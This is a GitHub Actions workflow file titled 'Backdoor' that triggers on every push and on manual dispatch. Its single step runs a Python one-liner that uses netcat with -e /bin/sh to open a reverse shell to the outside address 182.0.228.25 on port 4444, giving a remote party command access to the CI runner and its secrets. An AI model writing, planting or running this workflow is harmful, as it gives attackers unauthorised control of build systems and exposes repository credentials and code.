
name: Backdoor
on: [push, workflow_dispatch]
jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      - run: python -c "import os,subprocess,requests;subprocess.Popen(['nc','-e','/bin/sh','182.0.228.25','4444'])"
